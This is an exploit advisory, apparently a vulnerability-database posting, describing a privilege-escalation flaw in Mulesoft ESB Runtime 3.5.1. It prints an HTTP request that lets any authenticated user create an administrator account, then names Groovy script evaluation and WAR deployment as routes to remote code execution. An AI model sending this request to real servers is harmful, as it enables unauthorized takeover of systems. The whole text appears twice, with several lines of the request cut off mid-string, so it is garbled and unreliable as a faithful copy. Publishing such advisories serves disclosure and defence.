Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation → Remote Code
Execution
Mulesoft ESB Runtime 3.5.1 allows any arbitrary authenticated user to
create an administrator user due to a lack of permissions check in the
handler/securityService.rpc endpoint. The following HTTP request can be
made by any authenticated user, even those with a single role of Monitor.
POST /mmc-3.5.1/handler/
Host: 192.168.0.22:8585
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0)
Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/x-gwt-rpc; charset=utf-8/
Referer: http://192.168.0.22:8585/mmc-
Content-Length: 503
Cookie: JSESSIONID=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
7|0|15|http://192.168.0.22:
|
fdsafdsa@fdsafdsa.com
|java.util.ArrayList/4159755760|
This request will create an administrator with all roles with a username
of notadmin and a password of notpassword. Many vectors of remote code
execution are available to an administrator. Not only can an administrator
deploy WAR applications, they can also evaluate arbitrary groovy scripts
via the web interface.
Authored by Brandon Perry
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
Execution
Mulesoft ESB Runtime 3.5.1 allows any arbitrary authenticated user to
create an administrator user due to a lack of permissions check in the
handler/securityService.rpc endpoint. The following HTTP request can be
made by any authenticated user, even those with a single role of Monitor.
POST /mmc-3.5.1/handler/
Host: 192.168.0.22:8585
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0)
Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/x-gwt-rpc; charset=utf-8/
Referer: http://192.168.0.22:8585/mmc-
Content-Length: 503
Cookie: JSESSIONID=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
7|0|15|http://192.168.0.22:
|
fdsafdsa@fdsafdsa.com
|java.util.ArrayList/4159755760|
This request will create an administrator with all roles with a username
of notadmin and a password of notpassword. Many vectors of remote code
execution are available to an administrator. Not only can an administrator
deploy WAR applications, they can also evaluate arbitrary groovy scripts
via the web interface.
Authored by Brandon Perry
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information